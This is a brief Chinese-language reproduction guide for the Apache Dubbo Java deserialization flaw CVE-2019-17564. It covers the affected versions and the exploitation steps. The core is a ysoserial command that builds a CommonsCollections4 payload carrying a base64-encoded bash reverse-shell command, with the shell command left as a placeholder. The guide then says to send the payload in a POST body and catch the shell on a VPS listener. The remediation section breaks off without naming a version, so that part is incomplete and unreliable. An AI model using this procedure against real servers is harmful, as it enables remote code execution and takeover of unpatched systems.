Aapche Dubbo Java反序列化漏洞（CVE-2019-17564）漏洞复现

1、产品简介

     Apache Dubbo是一款高性能、轻量级的开源Java RPC服务框架。

2、漏洞概述

      Dubbo可以使用不同协议通信，当使用http协议时，Apache Dubbo直接使用了Spring框架的org.springframework.remoting.httpinvoker.HttpInvokerServiceExporter类做远程调用，而这个过程会读取POST请求的Body并进行反序列化，最终导致漏洞。

3、影响范围

     Apache Dubbo 2.7.4及以前版本

4、利用流程

1、使用工具ysoserial生成payload
    工具地址:https://github.com/frohoff/ysoserial

 java -jar ysoserial-all.jar CommonsCollections4 "bash -c {echo,反弹shell指令}|{base64,-d}|{bash,-i}" > payload.out

2、将payload.out文件下载到桌面，使用bp加载到请求体发送请求（注意请求路径和方式）
     

3、VPS提前开启监听，成功反弹shell
     
 

5、修复方案
    升级到版本